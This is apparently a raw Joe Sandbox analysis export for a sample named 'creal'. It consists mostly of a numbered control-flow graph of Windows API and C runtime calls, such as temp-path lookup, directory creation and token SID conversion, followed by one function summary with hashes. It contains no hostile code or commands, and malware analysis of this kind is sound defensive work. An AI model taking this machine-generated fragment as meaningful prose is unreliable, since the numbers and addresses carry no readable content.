7ff67a6122bf 15937->15940 15939 7ff67a610dc0 12 API calls 15938->15939 15942 7ff67a61223f 15938->15942 15939->15942 15941 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 15940->15941 15941->15942 15942->15856 15944 7ff67a61ef40 15943->15944 15945 7ff67a614a00 45 API calls 15944->15945 15947 7ff67a61ef85 15944->15947 15948 7ff67a61ef45 __scrt_get_show_window_mode 15944->15948 15952 7ff67a61ef6e __scrt_get_show_window_mode 15944->15952 15945->15947 15946 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 15946->15948 15947->15948 15947->15952 16098 7ff67a6205c8 15947->16098 15948->15856 15952->15946 15952->15948 15954 7ff67a610de6 15953->15954 15955 7ff67a610df7 15953->15955 15961 7ff67a61ec30 15954->15961 15955->15954 15983 7ff67a61dcbc 15955->15983 15958 7ff67a610e38 15960 7ff67a61b00c __free_lconv_num 11 API calls 15958->15960 15959 7ff67a61b00c __free_lconv_num 11 API calls 15959->15958 15960->15954 15962 7ff67a61ec4d 15961->15962 15963 7ff67a61ec80 15961->15963 15964 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 15962->15964 15963->15962 15965 7ff67a61ecb2 15963->15965 15974 7ff67a614281 15964->15974 15970 7ff67a61edc5 15965->15970 15978 7ff67a61ecfa 15965->15978 15966 7ff67a61eeb7 16023 7ff67a61e11c 15966->16023 15968 7ff67a61ee7d 16016 7ff67a61e4b4 15968->16016 15970->15966 15970->15968 15971 7ff67a61ee4c 15970->15971 15972 7ff67a61ee0f 15970->15972 15975 7ff67a61ee05 15970->15975 16009 7ff67a61e794 15971->16009 15999 7ff67a61e9c4 15972->15999 15974->15909 15974->15911 15975->15968 15977 7ff67a61ee0a 15975->15977 15977->15971 15977->15972 15978->15974 15990 7ff67a61ab3c 15978->15990 15981 7ff67a61afc4 _wfindfirst32i64 17 API calls 15982 7ff67a61ef14 15981->15982 15984 7ff67a61dd07 15983->15984 15988 7ff67a61dccb _findclose 15983->15988 15985 7ff67a6155c4 _findclose 11 API calls 15984->15985 15987 7ff67a610e24 15985->15987 15986 7ff67a61dcee HeapAlloc 15986->15987 15986->15988 15987->15958 15987->15959 15988->15984 15988->15986 15989 7ff67a623d00 
_findclose 2 API calls 15988->15989 15989->15988 15991 7ff67a61ab49 15990->15991 15992 7ff67a61ab53 15990->15992 15991->15992 15997 7ff67a61ab6e 15991->15997 15993 7ff67a6155c4 _findclose 11 API calls 15992->15993 15994 7ff67a61ab5a 15993->15994 16032 7ff67a61afa4 15994->16032 15996 7ff67a61ab66 15996->15974 15996->15981 15997->15996 15998 7ff67a6155c4 _findclose 11 API calls 15997->15998 15998->15994 16034 7ff67a62481c 15999->16034 16003 7ff67a61ea6c 16004 7ff67a61eac1 16003->16004 16006 7ff67a61ea8c 16003->16006 16008 7ff67a61ea70 16003->16008 16087 7ff67a61e5b0 16004->16087 16083 7ff67a61e86c 16006->16083 16008->15974 16010 7ff67a62481c 38 API calls 16009->16010 16011 7ff67a61e7de 16010->16011 16012 7ff67a624264 37 API calls 16011->16012 16013 7ff67a61e82e 16012->16013 16014 7ff67a61e832 16013->16014 16015 7ff67a61e86c 45 API calls 16013->16015 16014->15974 16015->16014 16017 7ff67a62481c 38 API calls 16016->16017 16018 7ff67a61e4ff 16017->16018 16019 7ff67a624264 37 API calls 16018->16019 16020 7ff67a61e557 16019->16020 16021 7ff67a61e55b 16020->16021 16022 7ff67a61e5b0 45 API calls 16020->16022 16021->15974 16022->16021 16024 7ff67a61e161 16023->16024 16025 7ff67a61e194 16023->16025 16026 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 16024->16026 16027 7ff67a61e1ac 16025->16027 16029 7ff67a61e22d 16025->16029 16031 7ff67a61e18d __scrt_get_show_window_mode 16026->16031 16028 7ff67a61e4b4 46 API calls 16027->16028 16028->16031 16030 7ff67a614a00 45 API calls 16029->16030 16029->16031 16030->16031 16031->15974 16033 7ff67a61ae3c _invalid_parameter_noinfo 37 API calls 16032->16033 16035 7ff67a62486f fegetenv 16034->16035 16036 7ff67a62877c 37 API calls 16035->16036 16041 7ff67a6248c2 16036->16041 16037 7ff67a6248ef 16040 7ff67a61ab3c __std_exception_copy 37 API calls 16037->16040 16038 7ff67a6249b2 16039 7ff67a62877c 37 API calls 16038->16039 16042 7ff67a6249dc 16039->16042 16044 7ff67a62496d 16040->16044 16041->16038 16045 7ff67a6248dd 16041->16045 16046 
7ff67a62498c 16041->16046 16043 7ff67a62877c 37 API calls 16042->16043 16047 7ff67a6249ed 16043->16047 16048 7ff67a625a94 16044->16048 16053 7ff67a624975 16044->16053 16045->16037 16045->16038 16049 7ff67a61ab3c __std_exception_copy 37 API calls 16046->16049 16050 7ff67a628970 20 API calls 16047->16050 16051 7ff67a61afc4 _wfindfirst32i64 17 API calls 16048->16051 16049->16044 16060 7ff67a624a56 __scrt_get_show_window_mode 16050->16060 16052 7ff67a625aa9 16051->16052 16054 7ff67a60bdc0 _wfindfirst32i64 8 API calls 16053->16054 16055 7ff67a61ea11 16054->16055 16079 7ff67a624264 16055->16079 16056 7ff67a624dff __scrt_get_show_window_mode 16057 7ff67a62513f 16059 7ff67a624380 37 API calls 16057->16059 16058 7ff67a624a97 memcpy_s 16076 7ff67a6253db memcpy_s __scrt_get_show_window_mode 16058->16076 16078 7ff67a624ef3 memcpy_s __scrt_get_show_window_mode 16058->16078 16065 7ff67a625857 16059->16065 16060->16056 16060->16058 16063 7ff67a6155c4 _findclose 11 API calls 16060->16063 16061 7ff67a6250eb 16061->16057 16062 7ff67a625aac memcpy_s 37 API calls 16061->16062 16062->16057 16064 7ff67a624ed0 16063->16064 16066 7ff67a61afa4 _invalid_parameter_noinfo 37 API calls 16064->16066 16068 7ff67a625aac memcpy_s 37 API calls 16065->16068 16075 7ff67a6258b2 16065->16075 16066->16058 16067 7ff67a625a38 16070 7ff67a62877c 37 API calls 16067->16070 16068->16075 16069 7ff67a6155c4 11 API calls _findclose 16069->16078 16070->16053 16071 7ff67a6155c4 11 API calls _findclose 16071->16076 16072 7ff67a624380 37 API calls 16072->16075 16073 7ff67a61afa4 37 API calls _invalid_parameter_noinfo 16073->16078 16074 7ff67a625aac memcpy_s 37 API calls 16074->16075 16075->16067 16075->16072 16075->16074 16076->16057 16076->16061 16076->16071 16077 7ff67a61afa4 37 API calls _invalid_parameter_noinfo 16076->16077 16077->16076 16078->16061 16078->16069 16078->16073 16080 7ff67a624283 16079->16080 16081 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 16080->16081 16082 7ff67a6242ae memcpy_s 
16080->16082 16081->16082 16082->16003 16082->16082 16084 7ff67a61e898 memcpy_s 16083->16084 16085 7ff67a614a00 45 API calls 16084->16085 16086 7ff67a61e952 memcpy_s __scrt_get_show_window_mode 16084->16086 16085->16086 16086->16008 16088 7ff67a61e5eb 16087->16088 16092 7ff67a61e638 memcpy_s 16087->16092 16089 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 16088->16089 16090 7ff67a61e617 16089->16090 16090->16008 16091 7ff67a61e6a3 16093 7ff67a61ab3c __std_exception_copy 37 API calls 16091->16093 16092->16091 16094 7ff67a614a00 45 API calls 16092->16094 16097 7ff67a61e6e5 memcpy_s 16093->16097 16094->16091 16095 7ff67a61afc4 _wfindfirst32i64 17 API calls 16096 7ff67a61e790 16095->16096 16097->16095 16100 7ff67a6205ec WideCharToMultiByte 16098->16100 16102 7ff67a610f81 16101->16102 16103 7ff67a610f93 16101->16103 16104 7ff67a6155c4 _findclose 11 API calls 16102->16104 16106 7ff67a610fa0 16103->16106 16109 7ff67a610fdd 16103->16109 16105 7ff67a610f86 16104->16105 16107 7ff67a61afa4 _invalid_parameter_noinfo 37 API calls 16105->16107 16108 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 16106->16108 16115 7ff67a610f91 16107->16115 16108->16115 16110 7ff67a611086 16109->16110 16111 7ff67a6155c4 _findclose 11 API calls 16109->16111 16112 7ff67a6155c4 _findclose 11 API calls 16110->16112 16110->16115 16113 7ff67a61107b 16111->16113 16114 7ff67a611130 16112->16114 16116 7ff67a61afa4 _invalid_parameter_noinfo 37 API calls 16113->16116 16117 7ff67a61afa4 _invalid_parameter_noinfo 37 API calls 16114->16117 16115->15735 16116->16110 16117->16115 16119 7ff67a614a3f 16118->16119 16120 7ff67a61e091 16118->16120 16122 7ff67a61e0e4 16119->16122 16120->16119 16126 7ff67a623a74 16120->16126 16123 7ff67a61e0fd 16122->16123 16124 7ff67a614a4f 16122->16124 16123->16124 16170 7ff67a622dc0 16123->16170 16124->15735 16138 7ff67a61b810 GetLastError 16126->16138 16130 7ff67a623ace 16130->16119 16139 7ff67a61b851 FlsSetValue 16138->16139 16140 7ff67a61b834 FlsGetValue 16138->16140 
16142 7ff67a61b863 16139->16142 16157 7ff67a61b841 16139->16157 16141 7ff67a61b84b 16140->16141 16140->16157 16141->16139 16144 7ff67a61f258 _findclose 11 API calls 16142->16144 16143 7ff67a61b8bd SetLastError 16145 7ff67a61b8ca 16143->16145 16146 7ff67a61b8dd 16143->16146 16147 7ff67a61b872 16144->16147 16145->16130 16160 7ff67a620db8 EnterCriticalSection 16145->16160 16161 7ff67a61ab9c 16146->16161 16148 7ff67a61b890 FlsSetValue 16147->16148 16149 7ff67a61b880 FlsSetValue 16147->16149 16152 7ff67a61b89c FlsSetValue 16148->16152 16153 7ff67a61b8ae 16148->16153 16151 7ff67a61b889 16149->16151 16155 7ff67a61b00c __free_lconv_num 11 API calls 16151->16155 16152->16151 16156 7ff67a61b5b8 _findclose 11 API calls 16153->16156 16155->16157 16158 7ff67a61b8b6 16156->16158 16157->16143 16159 7ff67a61b00c __free_lconv_num 11 API calls 16158->16159 16159->16143 16162 7ff67a623dc0 __FrameHandler3::FrameUnwindToEmptyState EnterCriticalSection LeaveCriticalSection 16161->16162 16163 7ff67a61aba5 16162->16163 16164 7ff67a61abb4 16163->16164 16165 7ff67a623e10 __FrameHandler3::FrameUnwindToEmptyState 44 API calls 16163->16165 16166 7ff67a61abe7 __FrameHandler3::FrameUnwindToEmptyState 16164->16166 16167 7ff67a61abbd IsProcessorFeaturePresent 16164->16167 16165->16164 16168 7ff67a61abcc 16167->16168 16169 7ff67a61acd8 _wfindfirst32i64 14 API calls 16168->16169 16169->16166 16171 7ff67a61b810 __FrameHandler3::FrameUnwindToEmptyState 45 API calls 16170->16171 16172 7ff67a622dc9 16171->16172 16180 7ff67a61546c EnterCriticalSection 16173->16180 16182 7ff67a6028ac 16181->16182 16183 7ff67a614bc4 49 API calls 16182->16183 16184 7ff67a6028fd 16183->16184 16185 7ff67a6155c4 _findclose 11 API calls 16184->16185 16186 7ff67a602902 16185->16186 16200 7ff67a6155e4 16186->16200 16189 7ff67a601ef0 49 API calls 16190 7ff67a602931 __scrt_get_show_window_mode 16189->16190 16191 7ff67a608be0 57 API calls 16190->16191 16192 7ff67a602966 16191->16192 16193 7ff67a6029a3 MessageBoxA 16192->16193 16194 
7ff67a60296b 16192->16194 16196 7ff67a6029bd 16193->16196 16195 7ff67a608be0 57 API calls 16194->16195 16197 7ff67a602985 MessageBoxW 16195->16197 16198 7ff67a60bdc0 _wfindfirst32i64 8 API calls 16196->16198 16197->16196 16199 7ff67a6029cd 16198->16199 16199->15388 16201 7ff67a61b988 _findclose 11 API calls 16200->16201 16202 7ff67a6155fb 16201->16202 16203 7ff67a602909 16202->16203 16204 7ff67a61f258 _findclose 11 API calls 16202->16204 16207 7ff67a61563b 16202->16207 16203->16189 16205 7ff67a615630 16204->16205 16206 7ff67a61b00c __free_lconv_num 11 API calls 16205->16206 16206->16207 16207->16203 16212 7ff67a61f928 16207->16212 16210 7ff67a61afc4 _wfindfirst32i64 17 API calls 16211 7ff67a615680 16210->16211 16216 7ff67a61f945 16212->16216 16213 7ff67a61f94a 16214 7ff67a615661 16213->16214 16215 7ff67a6155c4 _findclose 11 API calls 16213->16215 16214->16203 16214->16210 16217 7ff67a61f954 16215->16217 16216->16213 16216->16214 16219 7ff67a61f994 16216->16219 16218 7ff67a61afa4 _invalid_parameter_noinfo 37 API calls 16217->16218 16218->16214 16219->16214 16220 7ff67a6155c4 _findclose 11 API calls 16219->16220 16220->16217 16222 7ff67a608d82 WideCharToMultiByte 16221->16222 16223 7ff67a608d14 WideCharToMultiByte 16221->16223 16224 7ff67a608daf 16222->16224 16228 7ff67a603f35 16222->16228 16225 7ff67a608d3e 16223->16225 16226 7ff67a608d55 16223->16226 16227 7ff67a6029e0 57 API calls 16224->16227 16229 7ff67a6029e0 57 API calls 16225->16229 16226->16222 16230 7ff67a608d6b 16226->16230 16227->16228 16228->15397 16228->15400 16229->16228 16231 7ff67a6029e0 57 API calls 16230->16231 16231->16228 16233 7ff67a61aab3 16232->16233 16236 7ff67a607bee 16232->16236 16234 7ff67a61ab3c __std_exception_copy 37 API calls 16233->16234 16233->16236 16235 7ff67a61aae0 16234->16235 16235->16236 16237 7ff67a61afc4 _wfindfirst32i64 17 API calls 16235->16237 16236->15415 16238 7ff67a61ab10 16237->16238 16240 7ff67a603fe0 116 API calls 16239->16240 16241 7ff67a601ad6 16240->16241 16242 
7ff67a601c84 16241->16242 16243 7ff67a6082c0 83 API calls 16241->16243 16244 7ff67a60bdc0 _wfindfirst32i64 8 API calls 16242->16244 16245 7ff67a601b0e 16243->16245 16246 7ff67a601c98 16244->16246 16270 7ff67a601b3f 16245->16270 16278 7ff67a610914 16245->16278 16246->15435 16272 7ff67a603e50 16246->16272 16248 7ff67a61028c 74 API calls 16248->16242 16249 7ff67a601b28 16250 7ff67a601b44 16249->16250 16251 7ff67a601b2c 16249->16251 16282 7ff67a6105dc 16250->16282 16252 7ff67a602890 59 API calls 16251->16252 16252->16270 16255 7ff67a601b5f 16258 7ff67a602890 59 API calls 16255->16258 16256 7ff67a601b77 16257 7ff67a610914 73 API calls 16256->16257 16259 7ff67a601bc4 16257->16259 16258->16270 16260 7ff67a601bee 16259->16260 16261 7ff67a601bd6 16259->16261 16263 7ff67a6105dc _fread_nolock 53 API calls 16260->16263 16262 7ff67a602890 59 API calls 16261->16262 16262->16270 16264 7ff67a601c03 16263->16264 16265 7ff67a601c1e 16264->16265 16266 7ff67a601c09 16264->16266 16285 7ff67a610350 16265->16285 16268 7ff67a602890 59 API calls 16266->16268 16268->16270 16270->16248 16271 7ff67a602b30 59 API calls 16271->16270 16273 7ff67a601ef0 49 API calls 16272->16273 16274 7ff67a603e6d 16273->16274 16274->15434 16276 7ff67a601ef0 49 API calls 16275->16276 16277 7ff67a604090 16276->16277 16277->15435 16279 7ff67a610944 16278->16279 16291 7ff67a6106a4 16279->16291 16281 7ff67a61095d 16281->16249 16303 7ff67a6105fc 16282->16303 16286 7ff67a610359 16285->16286 16287 7ff67a601c32 16285->16287 16288 7ff67a6155c4 _findclose 11 API calls 16286->16288 16287->16270 16287->16271 16289 7ff67a61035e 16288->16289 16292 7ff67a61070e 16291->16292 16293 7ff67a6106ce 16291->16293 16292->16293 16295 7ff67a61071a 16292->16295 16294 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 16293->16294 16297 7ff67a6106f5 16294->16297 16302 7ff67a61546c EnterCriticalSection 16295->16302 16297->16281 16304 7ff67a610626 16303->16304 16305 7ff67a601b59 16303->16305 16304->16305 16306 7ff67a610672 16304->16306 16307 
7ff67a610635 __scrt_get_show_window_mode 16304->16307 16305->16255 16305->16256 16316 7ff67a61546c EnterCriticalSection 16306->16316 16309 7ff67a6155c4 _findclose 11 API calls 16307->16309 16311 7ff67a61064a 16309->16311 16314 7ff67a61afa4 _invalid_parameter_noinfo 37 API calls 16311->16314 16314->16305 16318 7ff67a60869f GetTokenInformation 16317->16318 16319 7ff67a608721 __vcrt_freefls 16317->16319 16320 7ff67a6086cb 16318->16320 16321 7ff67a6086c0 GetLastError 16318->16321 16322 7ff67a60873a 16319->16322 16323 7ff67a608734 CloseHandle 16319->16323 16320->16319 16324 7ff67a6086e7 GetTokenInformation 16320->16324 16321->16319 16321->16320 16322->15444 16323->16322 16324->16319 16325 7ff67a60870a 16324->16325 16325->16319 16326 7ff67a608714 ConvertSidToStringSidW 16325->16326 16326->16319 16328 7ff67a608775 16327->16328 16344 7ff67a614e18 16328->16344 16332 7ff67a602c70 16331->16332 16333 7ff67a614bc4 49 API calls 16332->16333 16334 7ff67a602cbb __scrt_get_show_window_mode 16333->16334 16335 7ff67a608be0 57 API calls 16334->16335 16336 7ff67a602cf0 16335->16336 16337 7ff67a602cf5 16336->16337 16338 7ff67a602d2d MessageBoxA 16336->16338 16339 7ff67a608be0 57 API calls 16337->16339 16340 7ff67a602d47 16338->16340 16341 7ff67a602d0f MessageBoxW 16339->16341 16342 7ff67a60bdc0 _wfindfirst32i64 8 API calls 16340->16342 16341->16340 16343 7ff67a602d57 16342->16343 16343->15454 16347 7ff67a614e72 16344->16347 16345 7ff67a614e97 16346 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 16345->16346 16361 7ff67a614ec1 16346->16361 16347->16345 16348 7ff67a614ed3 16347->16348 16362 7ff67a6131d0 16348->16362 16351 7ff67a614fb4 16353 7ff67a61b00c __free_lconv_num 11 API calls 16351->16353 16352 7ff67a60bdc0 _wfindfirst32i64 8 API calls 16354 7ff67a608798 16352->16354 16353->16361 16354->15451 16355 7ff67a614f89 16358 7ff67a61b00c __free_lconv_num 11 API calls 16355->16358 16356 7ff67a614fda 16356->16351 16357 7ff67a614fe4 16356->16357 16360 7ff67a61b00c __free_lconv_num 11 API 
calls 16357->16360 16358->16361 16359 7ff67a614f80 16359->16351 16359->16355 16360->16361 16361->16352 16363 7ff67a61320e 16362->16363 16364 7ff67a6131fe 16362->16364 16365 7ff67a613217 16363->16365 16371 7ff67a613245 16363->16371 16366 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 16364->16366 16367 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 16365->16367 16368 7ff67a61323d 16366->16368 16367->16368 16368->16351 16368->16355 16368->16356 16368->16359 16371->16364 16371->16368 16373 7ff67a613be4 16371->16373 16406 7ff67a613630 16371->16406 16443 7ff67a612dc0 16371->16443 16374 7ff67a613c26 16373->16374 16375 7ff67a613c97 16373->16375 16376 7ff67a613c2c 16374->16376 16377 7ff67a613cc1 16374->16377 16378 7ff67a613c9c 16375->16378 16379 7ff67a613cf0 16375->16379 16380 7ff67a613c60 16376->16380 16381 7ff67a613c31 16376->16381 16462 7ff67a611f94 16377->16462 16382 7ff67a613c9e 16378->16382 16383 7ff67a613cd1 16378->16383 16384 7ff67a613d07 16379->16384 16385 7ff67a613cfa 16379->16385 16390 7ff67a613cff 16379->16390 16387 7ff67a613c37 16380->16387 16380->16390 16381->16384 16381->16387 16388 7ff67a613c40 16382->16388 16393 7ff67a613cad 16382->16393 16469 7ff67a611b84 16383->16469 16476 7ff67a6148ec 16384->16476 16385->16377 16385->16390 16387->16388 16394 7ff67a613c72 16387->16394 16403 7ff67a613c5b 16387->16403 16404 7ff67a613d30 16388->16404 16446 7ff67a614398 16388->16446 16390->16404 16480 7ff67a6123a4 16390->16480 16393->16377 16396 7ff67a613cb2 16393->16396 16394->16404 16456 7ff67a6146d4 16394->16456 16399 7ff67a614798 37 API calls 16396->16399 16396->16404 16398 7ff67a60bdc0 _wfindfirst32i64 8 API calls 16400 7ff67a61402a 16398->16400 16399->16403 16400->16371 16401 7ff67a614a00 45 API calls 16405 7ff67a613f1c 16401->16405 16403->16401 16403->16404 16403->16405 16404->16398 16405->16404 16487 7ff67a61f0c8 16405->16487 16407 7ff67a61363e 16406->16407 16408 7ff67a613654 16406->16408 16410 7ff67a613c26 16407->16410 16411 7ff67a613c97 16407->16411 16423 
7ff67a613694 16407->16423 16409 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 16408->16409 16408->16423 16409->16423 16412 7ff67a613c2c 16410->16412 16413 7ff67a613cc1 16410->16413 16414 7ff67a613c9c 16411->16414 16415 7ff67a613cf0 16411->16415 16416 7ff67a613c60 16412->16416 16417 7ff67a613c31 16412->16417 16422 7ff67a611f94 38 API calls 16413->16422 16418 7ff67a613c9e 16414->16418 16419 7ff67a613cd1 16414->16419 16420 7ff67a613d07 16415->16420 16421 7ff67a613cfa 16415->16421 16428 7ff67a613cff 16415->16428 16424 7ff67a613c37 16416->16424 16416->16428 16417->16420 16417->16424 16425 7ff67a613c40 16418->16425 16430 7ff67a613cad 16418->16430 16426 7ff67a611b84 38 API calls 16419->16426 16429 7ff67a6148ec 45 API calls 16420->16429 16421->16413 16421->16428 16439 7ff67a613c5b 16422->16439 16423->16371 16424->16425 16431 7ff67a613c72 16424->16431 16424->16439 16427 7ff67a614398 47 API calls 16425->16427 16441 7ff67a613d30 16425->16441 16426->16439 16427->16439 16432 7ff67a6123a4 38 API calls 16428->16432 16428->16441 16429->16439 16430->16413 16433 7ff67a613cb2 16430->16433 16434 7ff67a6146d4 46 API calls 16431->16434 16431->16441 16432->16439 16436 7ff67a614798 37 API calls 16433->16436 16433->16441 16434->16439 16435 7ff67a60bdc0 _wfindfirst32i64 8 API calls 16437 7ff67a61402a 16435->16437 16436->16439 16437->16371 16438 7ff67a614a00 45 API calls 16442 7ff67a613f1c 16438->16442 16439->16438 16439->16441 16439->16442 16440 7ff67a61f0c8 46 API calls 16440->16442 16441->16435 16442->16440 16442->16441 16521 7ff67a611208 16443->16521 16447 7ff67a6143be 16446->16447 16448 7ff67a610dc0 12 API calls 16447->16448 16449 7ff67a61440e 16448->16449 16450 7ff67a61ec30 46 API calls 16449->16450 16459 7ff67a614709 16456->16459 16457 7ff67a61474e 16457->16403 16458 7ff67a614727 16461 7ff67a61f0c8 46 API calls 16458->16461 16459->16457 16459->16458 16460 7ff67a614a00 45 API calls 16459->16460 16460->16458 16461->16457 16463 7ff67a611fc7 16462->16463 16464 7ff67a611ff6 
16463->16464 16466 7ff67a6120b3 16463->16466 16468 7ff67a612033 16464->16468 16499 7ff67a610e68 16464->16499 16467 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 16466->16467 16467->16468 16468->16403 16471 7ff67a611bb7 16469->16471 16470 7ff67a611be6 16472 7ff67a610e68 12 API calls 16470->16472 16475 7ff67a611c23 16470->16475 16471->16470 16473 7ff67a611ca3 16471->16473 16472->16475 16474 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 16473->16474 16474->16475 16475->16403 16477 7ff67a61492f 16476->16477 16478 7ff67a614933 __crtLCMapStringW 16477->16478 16507 7ff67a614988 16477->16507 16478->16403 16481 7ff67a6123d7 16480->16481 16482 7ff67a612406 16481->16482 16484 7ff67a6124c3 16481->16484 16483 7ff67a610e68 12 API calls 16482->16483 16486 7ff67a612443 16482->16486 16483->16486 16485 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 16484->16485 16485->16486 16486->16403 16489 7ff67a61f0f9 16487->16489 16497 7ff67a61f107 16487->16497 16488 7ff67a61f127 16489->16488 16489->16497 16497->16405 16500 7ff67a610e9f 16499->16500 16506 7ff67a610e8e 16499->16506 16501 7ff67a61dcbc _fread_nolock 12 API calls 16500->16501 16500->16506 16506->16468 16508 7ff67a6149a6 16507->16508 16509 7ff67a6149ae 16507->16509 16510 7ff67a614a00 45 API calls 16508->16510 16509->16478 16510->16509 16522 7ff67a61123d 16521->16522 16523 7ff67a61124f 16521->16523 16524 7ff67a6155c4 _findclose 11 API calls 16522->16524 16525 7ff67a611299 16523->16525 16527 7ff67a61125d 16523->16527 16526 7ff67a611242 16524->16526 16531 7ff67a6155c4 _findclose 11 API calls 16525->16531 16537 7ff67a611615 16525->16537 16528 7ff67a61afa4 _invalid_parameter_noinfo 37 API calls 16526->16528 16529 7ff67a61aed8 _invalid_parameter_noinfo 37 API calls 16527->16529 16536 7ff67a61124d 16528->16536 16529->16536 16530 7ff67a6155c4 _findclose 11 API calls 16532 7ff67a6118a9 16530->16532 16533 7ff67a61160a 16531->16533 16534 7ff67a61afa4 _invalid_parameter_noinfo 37 API calls 16532->16534 16535 7ff67a61afa4 
_invalid_parameter_noinfo 37 API calls 16533->16535 16534->16536 16535->16537 16536->16371 16537->16530 16537->16536 16539 7ff67a607976 16538->16539 16540 7ff67a6079ed GetTempPathW 16539->16540 16541 7ff67a60799a 16539->16541 16543 7ff67a607a02 16540->16543 16542 7ff67a607b70 61 API calls 16541->16542 16544 7ff67a6079a6 16542->16544 16577 7ff67a602830 16543->16577 16589 7ff67a607430 16544->16589 16554 7ff67a607a1b __vcrt_freefls 16555 7ff67a607ac6 16554->16555 16560 7ff67a607a51 16554->16560 16581 7ff67a618ba4 16554->16581 16584 7ff67a608b80 16554->16584 16578 7ff67a602855 16577->16578 16579 7ff67a614e18 48 API calls 16578->16579 16580 7ff67a602874 16579->16580 16580->16554 16623 7ff67a6187d0 16581->16623 16585 7ff67a608ba6 CreateDirectoryW 16584->16585 16586 7ff67a608b90 16584->16586 16585->16554 16590 7ff67a60743c 16589->16590 16591 7ff67a608be0 57 API calls 16590->16591 16592 7ff67a60745e 16591->16592 16593 7ff67a607479 ExpandEnvironmentStringsW 16592->16593 16594 7ff67a607466 16592->16594 16596 7ff67a60749f __vcrt_freefls 16593->16596 16595 7ff67a602b30 59 API calls 16594->16595 16871 7ff67a60173e 16870->16871 16872 7ff67a601726 16870->16872 16874 7ff67a601744 16871->16874 16875 7ff67a601768 16871->16875 16873 7ff67a602b30 59 API calls 16872->16873 16876 7ff67a601732 16873->16876 17002 7ff67a6012b0 16874->17002 16963 7ff67a607c20 16875->16963 16876->15486 16881 7ff67a60178d 16884 7ff67a602890 59 API calls 16881->16884 16882 7ff67a6017b9 16885 7ff67a603fe0 116 API calls 16882->16885 16883 7ff67a60175f 16883->15486 16887 7ff67a6017a3 16884->16887 16888 7ff67a6017ce 16885->16888 16886 7ff67a602b30 59 API calls 16886->16883 16887->15486 16889 7ff67a6017ee 16888->16889 16890 7ff67a6017d6 16888->16890 16892 7ff67a610914 73 API calls 16889->16892 16891 7ff67a602b30 59 API calls 16890->16891 16893 7ff67a6017e5 16891->16893 16894 7ff67a6017ff 16892->16894 16913 7ff67a602d86 16912->16913 16914 7ff67a601ef0 49 API calls 16913->16914 16915 7ff67a602db9 16914->16915 16916 

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF67A6264B5
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A625E08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67A625E1C
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A61B00C: RtlFreeHeap.NTDLL(?,?,?,00007FF67A623492,?,?,?,00007FF67A6234CF,?,?,00000000,00007FF67A623995,?,?,00000000,00007FF67A6238C7), ref: 00007FF67A61B022
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A61B00C: GetLastError.KERNEL32(?,?,?,00007FF67A623492,?,?,?,00007FF67A6234CF,?,?,00000000,00007FF67A623995,?,?,00000000,00007FF67A6238C7), ref: 00007FF67A61B02C
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A61AFC4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF67A61AFA3,?,?,?,?,?,00007FF67A6131CC), ref: 00007FF67A61AFCD
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A61AFC4: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF67A61AFA3,?,?,?,?,?,00007FF67A6131CC), ref: 00007FF67A61AFF2
                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF67A6264A4
                                                                                                                                                                                                                  • Part of subcall function 00007FF67A625E68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67A625E7C
                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF67A62671A
                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF67A62672B
                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF67A62673C
                                                                                                                                                                                                                • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF67A62697C), ref: 00007FF67A626763
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1597467517.00007FF67A601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67A600000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597431935.00007FF67A600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597511727.00007FF67A62B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A63E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597558295.00007FF67A640000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1597631880.00007FF67A642000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff67a600000_creal.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                • API String ID: 4070488512-239921721
                                                                                                                                                                                                                • Opcode ID: bbcac37ccba8d4fb81487e2dc58aab96d0fddb0f5958181c110f5c0263e0c824
                                                                                                                                                                                                                • Instruction ID: 9d3594e3e490629fc97e48bd6a886d47fd45176c23ad9421567f0599cfd2d85b
